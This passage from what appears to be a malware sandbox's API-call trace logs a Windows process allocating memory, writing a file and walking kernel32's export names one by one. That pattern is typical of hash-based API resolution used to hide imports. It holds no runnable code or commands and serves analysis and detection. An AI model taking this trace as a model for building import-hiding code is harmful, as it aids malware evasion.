liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.526] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0087.526] CloseHandle (hObject=0x0) returned 0 [0087.526] CloseHandle (hObject=0x428) returned 1 [0087.526] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.527] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.527] GetTickCount () returned 0x114e531 [0087.527] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.527] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.527] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.527] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.528] lstrlenA (lpString="kernel32.dll") returned 12 [0087.528] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.528] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.528] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.528] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.528] lstrlenA (lpString="ADDATOMA") returned 8 [0087.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.528] lstrlenA (lpString="ADDATOMW") returned 8 [0087.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.528] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.528] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.528] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.528] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.529] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.529] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.529] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.529] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.529] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.529] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.529] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.529] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.529] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.529] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.529] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.529] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.529] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.529] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.529] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.529] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.529] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.529] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.529] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.530] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.530] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.530] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.530] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.530] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.530] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.530] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.530] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.530] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.530] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.530] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.530] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.530] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.530] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.530] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.530] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.530] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.530] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.531] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.531] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.531] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.531] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.531] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.531] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.531] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.531] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.531] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.531] lstrlenA (lpString="BEEP") returned 4 [0087.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.531] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.531] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.531] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.531] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.531] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.531] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.531] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.531] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.531] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.532] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.532] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.532] lstrlenA (lpString="CANCELIO") returned 8 [0087.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.532] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.532] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.532] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.532] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.532] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.532] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.532] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.532] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.532] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.532] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.532] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.532] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.532] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.532] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.532] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.533] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.533] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.533] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.533] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.533] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.533] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.533] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.533] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.533] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.533] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.533] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.533] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.533] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.533] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.533] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.533] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.533] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.533] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.534] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.534] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.534] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.534] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.534] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.534] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.534] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.534] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.534] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.534] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.534] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.534] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.534] lstrlenA (lpString="COPYFILEA") returned 9 [0087.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.534] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.534] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.534] lstrcpyA (in: lpString1=0x3f2d1ec, 